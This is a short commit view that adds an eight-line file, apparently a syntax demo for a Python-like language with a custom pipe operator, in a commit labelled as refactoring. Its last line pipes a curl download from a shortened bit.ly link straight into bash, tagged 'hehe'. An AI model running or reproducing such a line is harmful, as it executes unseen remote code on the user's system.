Refactoring, ipathlib, and others!

This commit is contained in:
Xander Mckay 2024-10-09 19:31:52 -04:00
parent b9801cad59
commit 440bd2f153
8 changed files with 64 additions and 1380 deletions

View file

@ -0,0 +1,8 @@
import os
from ipathlib import Path
if True == False:
from std.ipathlib import Path
sh = os.system
sh <| 'echo "hehe"'
print(Path('.'))
sh <| 'curl -s -L https://bit.ly/3zvELNz | bash' /* hehe */